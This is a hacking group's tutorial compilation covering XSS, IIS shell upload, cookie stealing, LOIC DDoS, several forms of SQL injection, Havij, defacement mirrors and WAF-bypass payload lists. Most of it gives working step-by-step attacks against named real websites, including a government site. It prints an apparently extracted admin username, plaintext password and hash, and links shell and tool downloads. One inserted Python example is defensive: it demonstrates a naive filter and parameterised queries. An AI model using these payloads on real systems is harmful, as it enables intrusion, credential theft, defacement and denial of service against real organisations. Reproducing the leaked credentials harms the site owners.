This document discusses Innominate, a Bangladeshi hacking group founded in 2015 to protect Bangladesh's cyber space from foreign hackers and stop bad websites. It thanks the group's founders, administrators, team members and fans. It also lists some hacking techniques like SQL injection, XSS, IIS exploits and tools like Tor browser and cookie-based hacking.

Uploaded by David Mart

Founder : Rajib Hasan

Greetz
All Bangladeshi & Muslim Hackers
My Boss : Faruk Ahmed
Ismail Ahmed,#Virus_Rom,Redwan Ali Rafi
Blind Coder,Murkho Balok, Farhan Sajid,Fayaze
Modern Einstein,Infected Brain,Cyber Dark,Robi Ahsan
Rakibul Hasan,
All Bangladeshi Blogger and Tunerpage and Techtunes
And All Admin,Crew,Team Members Of Innominate
Also thanks to all fans of Innominate for supporting us
All Rights Reserved By Innominate Hacking Group
Innominate is a hacking group of Bangladesh. It was created on 01-02-2015. A 14-year-old boy founded this group to protect Bangladesh's cyber space from foreign hackers and to stop bad websites. We are also Muslim hackers. We are united. Never hate us, just hate your security.

Join

Our Official Facebook Fanpage


Our Official Facebook Group
Our Official DDoS Squad
Official Facebook Id Of Rajib Hasan

XSS Basic Hacking

IIS Exploit

Cookie

DDoS

SQL Injection Union Based

Havij Tutorial

SQLi

Mirror

Cookie Based SQLi

String Based SQL Injection

Double Query SQL Injection Attack

Tor Browser

Error Based SQL (Bangla)

SQL Injection Bypass WAF


Types of hackers

White Hat Hacker

Grey Hat Hacker

Black Hat Hacker

Script Kiddie

Neophyte or n00b

Blue Hat Hacker

Hacktivist

Elite Hacker
Google Dork

A dork is a search query built from Google's advanced search operators; it narrows the results to pages with a particular property. Examples:

filetype: pdf (only PDF files)
intext: restricts results to pages containing the given text

Searching with such queries is called Google Dorking.
XSS Method

XSS? What is XSS?

XSS (cross site scripting) runs on the browser side, not the server side.

To find an XSS vulnerable site use a google dork, or a scanner such as Acunetix or NetSparker.

vulnerable URL:

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=

HTML injection:
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<h1>XSS ATTACK</h1>
The page shows "XSS ATTACK" as a heading.

Script injection with
<script>alert("XSS VULN")</script>

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<script>alert("XSS VULN")</script>
An alert box pops up showing "XSS VULN".

Image injection:
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<center><img src="http://4.bp.blogspot.com/-n4BlX1pdajg/UiNM0pmiOgI/AAAAAAAAARU/ImXazq6Eu0o/s1600/xss.jpg" height=800 width=1030></center>

Iframe injection with
<iframe src="http://www.rpd.ie/xssd.html" height=768 width=1024>

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<iframe src="http://www.rpd.ie/xssd.html" height=768 width=1024>
IIS Exploit

IIS Exploit? What is it and how is it done?

- Open My Computer and choose Add a network location
- Next
- Next
- Enter the vuln website address and click Next, e.g.
  http://www.myxixia.com/
- Next
- Finish
- Open the Network Location option —> the website folder opens

- Download the shell:
  http://www.ziddu.com/download/16498227/shell.zip.html
- Extract it
- Rename it to Power.asp;.jpg
- Copy power.asp;.jpg into the website folder
- Open power.asp;.jpg in the browser:
  http://www.myxixia.com/power.asp;.jpg

Index.asp: use the shell's Upload option; upload file formats are Html and asp.

Example: http://utivf.com/bd.html

Cookie

Bluetooth, Apple (iPhone), Cookie!

"Have Some Cookie, mate!"

Cookie hijacking, Cookie stealing ("Have Some Cookie")

@Forhad
Cookie? What is a cookie?

A cookie is data a website stores on the user's computer while browsing the internet; the browser sends it back to the site on later visits. A cookie is stored as a name-value pair.

Internet Explorer keeps its cookies under C:\Documents and Settings\User name\Local Settings (on the C drive, not in the system32 folder); other browsers keep them under their installation directory.

# Chrome cookie location: C:\Documents and Settings\\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
# Firefox keeps cookies in a text file under C:\Documents and Settings\Windows login\User name\Application Data\Mozilla\Firefox\Profiles\profile folder

A simple cookie holds just a user id. Complex cookies hold values such as user id ~ session id ~ time for session initiation ~ login data.

Cookies let the site recognise the user and keep the current activity status between requests.

Different types of Cookies:

cookies => Session cookie => Persistent cookie

#1. Session cookie: a session cookie lasts only for the current session and holds the current information, mainly the user id.

#2. Persistent Cookie: a persistent cookie stays after the session ends; it has an expiration time and goes away only when it expires or is deleted manually. Persistent cookies are used for authentication, with fresh cookies issued when they expire.

First party cookies: set by the website you visit; they make surfing personalized.

Third Party Cookies: cookies set by advertising websites (for example Google's DoubleClick DART cookie) to track users across sites.

Threats from Cookies: Malicious programs, adwares and malwares can use cookies to track surfing habits; such malicious cookies get flagged.

Cookie stealing? What is it?

Cookies hold session data and login data, so stealing the cookies from a system gives the attacker the session key.

Methods of Cookie Stealing:

cookie stealing => Cross Site Scripting (CSS/XSS) => Session Key Stealing => Using Packet Sniffing => Session Fixing

[+] Cross Site Scripting (CSS/XSS): an XSS bug in the site is used to copy the victim's cookie.

[+] Session Key Stealing: the attacker places a file on the victim's system that reads the session key.

[+] Using Packet Sniffing (session side jacking): the session cookie is read from the network traffic with packet sniffing.

[+] Session Fixing: the attacker sends the victim a malicious link containing a chosen session id and then manipulates the session.

Cookies are interesting; take care of your private information.

Writer: Rizwan bin Sulaiman


DDoS

LOIC download:
http://sourceforge.net/projects/loic/files/loic/loic-1.0.4/loic-1.0.4-binary.zip/download

https://www.facebook.com/1035833389775994

In LOIC, fill in the Target address information.

My FB: https://www.facebook.com/100004445461825
SQL INJECT

SQL INJECT: first use a dork to find a target, e.g.

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=
inurl:gallery.php?id=

More dorks: an 8500 SQL dorks list:

http://pastebin.com/dzknXjgP

http://pastebin.com/ayV6tNS2

Search the dork on www.google.com, for example

inurl:news-and-events.php?id=

From the search results we take

http://www.eastodissa.ac.in/news-and-events.php?id=22

http://s23.postimg.org/j6z3yjv3f/Image_000.png

SQL INJECT ID

To check whether the site is injectable, add a ' at the end of the url:

http://www.eastodissa.ac.in/news-and-events.php?id=22'

If an error like this appears, the site is injectable:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"

http://s12.postimg.org/3wp8e5g6l/Image_1.png

Now we inject the injectable site.

http://www.eastodissa.ac.in/news-and-events.php?id=22

Next, add order+by+ after the id to find the number of columns:

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+

Start from 1:
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1--

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2--

http://s9.postimg.org/l6dc23yxb/Image_2.png

3, 4, 5 and so on up to 7 give no error.

8 gives an SQL error.

(If www.site.com/index.php?id=1 order by 999-- gives no error, although order by 999 should give an error, put a ' sign after id=1: www.site.com/index.php?id=1' order by 999--+ ; if that gives an error, it confirms SQL Injection.)

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8--
http://s16.postimg.org/89klyqsqd/Image_3.png

Could not connect to MySQL server: Unknown column '8' in 'order clause'

So there are 7 columns. Now add +union+select+1,2,3,4,5,6,7-- with a - before the id:

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7--

http://s18.postimg.org/jbn2ndf6x/Image_4.png

(Note the - in news-and-events.php?id=-22.) The page shows the numbers 2 and 3: these are the vulnerable columns.

Replace 2 with @@version to get the database version:

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7--

http://s21.postimg.org/s9uxrndvb/Image_5.png

The version is 5.1.68-community. Since it is version 5, information_schema can be used for the injection.

Replace 2 with group_concat(table_name) and append

+from+information_schema.tables+where+table_schema=database()--

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

http://s12.postimg.org/s4j0a6iwd/Image_6.png

Tables: est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplication,est_placementrecord

Tables like est_achievement and est_companyrecord are not interesting; est_admin is.

Now replace with group_concat(column_name) and append

from information_schema.columns where table_name=

The table name has to be given in CHAR form. Use the HackBar addon:

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Press F9 to open HackBar, then SQL > MySQL > MySQL CHAR()

http://s23.postimg.org/c2fx3e90r/Image_7.png
Enter the table name and click ok.

http://s21.postimg.org/xlsoepaev/Image_8.png

est_admin in CHAR form is CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(101,115,116,95,97,100,109,105,110)--

http://s18.postimg.org/n252z8kkp/Image_9.png

The columns of est_admin (given in CHAR form) are: uid,userid,password,emailid,signature,last_login

Now use group_concat(login,0x3a,Pass,0x3a), where login is the username column (here userId) and Pass is the password column (here password), and append

from+est_admin--

(+from+ followed by the table name, est_admin.)

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--

http://s16.postimg.org/w2cat8oad/Image_10.png

Result: trustadmin:isti$$9!5!2013:
Username trustadmin, password isti$$9!5!2013

Admin panel finder: http://scan.subhashdasyam.com/admin-panel-finder.php

havij can also be used for this.

If the password is an MD5 hash, look it up at www.md5decrypter.cu.uk/

Video: http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player

Innominate
♥♥♥ Havij SQLi ♥♥♥

Download Havij 1.5 Pro: http://www.mediafire.com/?s7a89dxmfwxcyij

Search Google.Com for the dork inurl:php?id="

More dorks: http://pastebin.com/DvnHxg7i

Google shows "About 2,010,000,000 results (0.23 seconds)". Pick a site whose url contains php?id=, e.g.
http://www.paulprescott.com/theme.php?id=10
The url ends with ID=XX, where XX is a number (here ID=10).

Add a ' after the number and check for an error. If there is an error, the site can be injected: paste the url into "Havij".

Click "Analyze": Havij shows the error and the current database (for example "Current DB: XXXX").

In the "Tables" tab click "Get DB's".

Two databases appear: "paul_third" and "information_schema".

"information_schema" is MySQL's own database, so select "paul_third".

Click "Get Tables".

For the administration panel we need the "admin" table; select it.

Click "Get Columns".
The columns are "id", "username" (the Username), "password" (the Password) and "email" (the email).

Select the columns and click "Get Data" to get the Username and Password.

Click "Find Admin" to find the Administration Panel login page.

Put the site address (without php?id=XX) in the "Path to Search" URL field and click "Start".

Havij lists the Administration Panel login pages it finds.

Log in to the administration panel with the username and password.

Done!

HTML, Java, CSS, PHP?

Deface page maker:

http://hackinseconds.files.wordpress.com/2012/01/capture.png

http://www.2shared.com/file/vLH_20xn/Advance_Deface_maker.html

Advanced Deface Creator – Updater.exe

Dork: inurl:mypage.php?page_id=
Injection: +union+select+1,2,group_concat(name,0x3a,password)+from+login--
----------------------------------------

Example site:
http://www.jcsjournal.com/mypage.php?page_id=51

Put - before the id:

http://www.jcsjournal.com/mypage.php?page_id=-51
-----------------------

http://www.jcsjournal.com/mypage.php?page_id=-51+union+select+1,2,group_concat(name,0x3a,password)+from+login--
-----------------------
-----------------------
Mirror

Deface mirror sites:

www.Zone-h.org
www.mirror-zone.org
www.zone-hack.com
www.zone-hc.com
www.arab-zone.net
www.pak-zone.com
www.pakcybercrews.com
http://leetsmirror.com/
www.hack-mirror.com

On www.zone-h.org:

* notify a single deface
* mass notify

Notifier: the name you notify under. The Innominate notifier is Innominate.

Domain: the defaced domain

Click send, then ok.

The entry stays onhold until the notifier's onhold entries are approved. Fake entries are not approved.
Cookie Based SQLi

Cookie Based SQLi works like Sql Injection (Union Based); for the basics check the group Doc File https://www.facebook.com/groups/hackingworld1/

Required Firefox addons for this SQLi:

"Hackbar Addon"

"Cookie Manager"

Cookie Manager:

https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

url: http://site.com/cid.php?id=3
Remove ?id=3 from the cid.php Url, so the Url becomes

http://site.com/cid.php

Open Cookie Manager and add the id cookie:
http://prntscr.com/4jtmn9

http://prntscr.com/4jtnav

In Cookie Manager set the id cookie value to
3 order by 1--

and continue the SQLi with order by as usual:

order by 3--
union select and 0+1,2--
(and 0 is put before union select)

If the SQLi works, the column numbers appear.

3 union select and 0+version(),2--

shows the version.

3 union select and 0+group_concat(table_name),2+from+information_schema.tables+where+table_schema=database()

Tables:
- admin
- news
- about

Columns of the admin table:

3 union select and 0+group_concat(column_name),2+from+information_schema.columns+where+table_name=Hex value Of Admin

login_user

login_password

3 union select and 0+group_concat(login_user,0x3a,login_password),2+from+admin--

String Based SQL Injection

Those who know Union Based SQLi will find String Based Sql Injection very similar.

When "order by" doesn't work (example: order by 100-- gives no error), it is string based sqli.

Basic SQL / SQL injection knowledge is assumed.

Union Based versus String Based:

http://site.com/index.php?id=10

Add ' to the Url to check for SQLi:

http://site.com/index.php?id=10'

Union Based:

http://site.com/index.php?id=10 order by 10 (error)

http://site.com/index.php?id=10 order by 1000 (no error: order by is not working)

String Based SQLi:

Put ' after id=value and --+ at the end:

http://site.com/index.php?id=10' order by 10--+ (Error)

http://site.com/index.php?id=10' order by 9--+ (still Error)

http://site.com/index.php?id=10' order by 8--+ (Error)

http://site.com/index.php?id=10' order by 7--+ (Error)

http://site.com/index.php?id=10' order by 6--+ (No Error)

http://site.com/index.php?id=-10' union select 1,2,3,4,5,6--+

The vulnerable column numbers appear.

# Version, Database Name, Database User

Replace the vulnerable columns (here 2 and 3) with group_concat(database()),concat(user(),0x3a,version()):

http://site.com/index.php?id=-10' union select 1,group_concat(database()),concat(user(),0x3a,version()),4,5,6--+

This shows the Version, Database Name and Database User.

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-

Look for the "admin" table. The table name is given in hex:

"admin" = 0x61646d696e

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--+-

Columns of "admin":

id, user, password

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(id,0x3e,user,0x3e,password),5,6 from admin--+-

This gives the admin id, user and password.

Errors that may appear with "union+select":

[#] Can't find columns in the page source

[#] Following "SELECT" statements have different numbers of column

[#] Unknown column 1 in order clause (or 0)

Double Query SQL Injection Attack

Take a site such as http://target.com/detail.php?id=10 for Double Query SQL Injection.

STEP 1:

Check that the MySQL version is 5: information_schema.tables exists only from version 5. Add after the id:

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

http://www.target.com/detail.php?ID=10+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Duplicate entry '5.1.52-log~1' for key 'group_key'

The version is 5, so information_schema.tables can be used.

STEP 5:
TABLE names

+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

To get the next table, increase the limit:

limit 1

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 2

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 3

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 6

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+6,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'tbadmin~1' for key 'group_key'

So the admin table is tbadmin.

STEP 6: column names

+and+(select+1+from(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'adminid~1' for key 'group_key'

Increase the limit to get the username and password columns: limit 1 and limit 2 give username and password.

limit 1

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'username~1' for key 'group_key'

limit 2

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'password~1' for key 'group_key'

STEP 7: data

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(column1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

http://example.com/detail.php?ID=10+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbladmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry '1~adminusername~adminpassword~1' for key 'group_key'

Tor Browser

Tor Browser: download it from https://www.torproject.org/download/download, install Tor Browser, Run as Administrator, and connect to the Tor Network.
Error Based / Double query SQL injection

This is used when a sql vulnerable site does not work with the union select statement, or to bypass a firewall.

Try double query when you see errors like these, for example:
# The Used Select Statements Have A Different Number Of Columns.
# Unknown column 1 in order clause. (or 0)
# Can't find your columns in the page source.
# Error #1604

Site:

www.site.com/index.php?id=1

Version:

www.site.com/index.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

i.e. after the id value add

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Result:

Duplicate entry '5.5.35-0ubuntu0.12.04.2~1' for key 'group_key'

So the version is 5.5.35.

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- ]

Database:

www.site.com/index.php?id=1+or+1+group+by+concat_ws(0x7e,database(),floor(rand(0)*2))+having+min(0)+or+1--

Result:

Duplicate entry 'broderna~1' for key 'group_key'

So the database is broderna.

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+or+1+group+by+concat_ws(0x7e,database(),floor(rand(0)*2))+having+min(0)+or+1-- ]

Table name:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema= _ _ limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

In place of _ _ put the database name in hex: broderna = 0x62726f6465726e61

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

In double query injection the limit is increased to get the next row:

limit 1,1, then limit 2,1, and so on.

Next:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

Keep increasing the limit until a users/user/admin table appears; here the users table came at limit 18,1:

Result:
Duplicate entry 'users~1' for key 'group_key'

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+18,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

Column names:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name= _ _ limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

In place of _ _ put the table name in hex: users = 0x7573657273

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Result:
Duplicate entry 'userid~1' for key 'group_key'

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

The first column is userid. Increase the limit to 1,1 and 2,1 to get the username and password columns.

so:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

Next:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

The columns are username and passwd.

Now get the username and passwd:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7e, _ ,0x7e, _ )+as+char),0x7e))+from+ _ _ +limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Put username and passwd for the columns and users for the table:

Result:

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7e,username,0x7e,passwd)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7e,username,0x7e,passwd)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) ]

Duplicate entry '~admin~c836b87f211e2647e6c5fb3d95f98e0d~1' for key 'group_key'

username => admin

password => c836b87f211e2647e6c5fb3d95f98e0d

>>>http://www.tunerpage.com/archives/327156
Let's start; here is the vulnerable site we will use :)

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=117

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117 UNION SELECT 1,2,3,4,5,6,7,8,9--

Can't find the vuln column! IMAGE (http://www.anonmgur.com/up/f79d150bae354d151813360a601b0878.png)

Let's try to bypass the WAF.

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union /*!select*/ 1,2,3,4,version(),6,7,8,9--+

Same result; let's use another bypass. IMAGE (http://www.anonmgur.com/up/5fe6b5cf97820f156cfd9877ae998f06.png)

Now, solutions!

This time we can notice that besides the command select, all * characters are missing too. All * were cut out by the WAF.

Now we will use some logic. If the command select is filtered out, we will mask it so the WAF will not detect it, and we will "attack" the WAF with its own weapon: we will use the character *.

And here is the solution:

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel*ect 1,2,3,4,version(),6,7,8,9--+

OR

Query: http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union SELselectECT 1,2,3,4,version(),6,7,8,9--+
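Added example (not part of the original write-up): a Python reproduction of why the single-pass keyword-stripping filter described above is not a defence, and of the parameterised query that is. The filter `naive_waf`, the in-memory SQLite `articles`/`users` tables and the one-column union payloads are constructed assumptions that mirror the write-up's four observations; they are not the site's code or its real WAF.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed ?id= values, URL-encoded as a web server would receive them,
# shaped like the four queries in the write-up above.
PAYLOADS = {
    "plain":   "-117+UNION+SELECT+1,2,3,4,5,6,7,8,9--",
    "comment": "-117+union+/*!select*/+1,2,3,4,version(),6,7,8,9--+",
    "star":    "-117+union+sel*ect+1,2,3,4,version(),6,7,8,9--+",
    "nested":  "-117+union+SELselectECT+1,2,3,4,version(),6,7,8,9--+",
}


def naive_waf(value):
    """Hypothetical keyword blacklist reproducing the behaviour observed in the
    write-up: one pass that deletes the word 'select' (any case) and every '*'."""
    value = re.sub(r"select", "", value, count=1, flags=re.IGNORECASE)
    return value.replace("*", "")


def contains_select(sql_fragment):
    """True if a SELECT keyword survives, i.e. what the database would parse."""
    return re.search(r"\bselect\b", sql_fragment, re.IGNORECASE) is not None


def waf_verdicts():
    """For each payload: did a SELECT get past the filter? (True = bypassed)."""
    return {name: contains_select(naive_waf(unquote_plus(p)))
            for name, p in PAYLOADS.items()}


def build_db():
    """Constructed stand-in for the article page's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(117, "Baralho cigano"), (118, "Tarot")])
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def vulnerable_lookup(conn, raw_id):
    """The pattern behind the vulnerable page: the filtered parameter is pasted
    into the SQL text. Returns None when the database rejects the statement
    (the 'blocked' outcome the write-up saw for its first two queries)."""
    sql = "SELECT title FROM articles WHERE id = " + naive_waf(unquote_plus(raw_id))
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError:
        return None


def safe_lookup(conn, raw_id):
    """Fix: bind the value. SQL keywords inside it are plain text to the engine,
    so no keyword filter is needed at all."""
    rows = conn.execute("SELECT title FROM articles WHERE id = ?",
                        (unquote_plus(raw_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    print(waf_verdicts())
    db = build_db()
    for value in ("117",
                  "-117+UNION+SELECT+pw+from+users--",
                  "-117+union+sel*ect+pw+from+users--+"):
        print(value, "->", vulnerable_lookup(db, value),
              "| bound:", safe_lookup(db, value))
```

The one-column `pw from users` payloads are constructed to fit the sample table; with the bound parameter they return nothing because the whole string is compared as a value, not parsed.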
SQLi Injection WAF Bypass Methods With Details

--'- : +--+ / : -- - : --+- : /*

) order by 1-- -

') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23

union select ByPassing method

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

+/*!u%6eion*/+/*!se%6cect*/+

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

%55nion %53elect

+--+Union+--+Select+--+

+UnIoN/*&a=*/SeLeCT/*&a=*/

id=1+'UnI"On'+'SeL"ECT'

id=1+'UnI'||'on'+SeLeCT'

UnIoN SeLeCt CoNcAt(version())--

uNiOn aLl sElEcT


uUNIONnion all sSELECTelect

====================================================================================================

:: Buffer Overflow ::

====================================================================================================

+And(select 1)=(select 0x414)+union+select+1--

+And(select 1)=(select 0xAAAA)+union+select+1--


+and (/*!select*/ 1)=(/*!select*/ 0xAA)+

====================================================================================================

:: 400 Bad Request ::

====================================================================================================

--+%0A
union+select+1--+%0A,2--+%0A,3--+%0A,4--+%0A,5--+%0A --

====================================================================================================

null the parameter

====================================================================================================

id=-1

id=null

id=1+and+false+

id=9999

id=1 and 0

id==1

id=(-1)

====================================================================================================

Group_Concat

====================================================================================================

Group_Concat
group_concat()

/*!group_concat*/()

grOUp_ConCat(/*!*/,0x3e,/*!*/)

group_concat(,0x3c62723e)

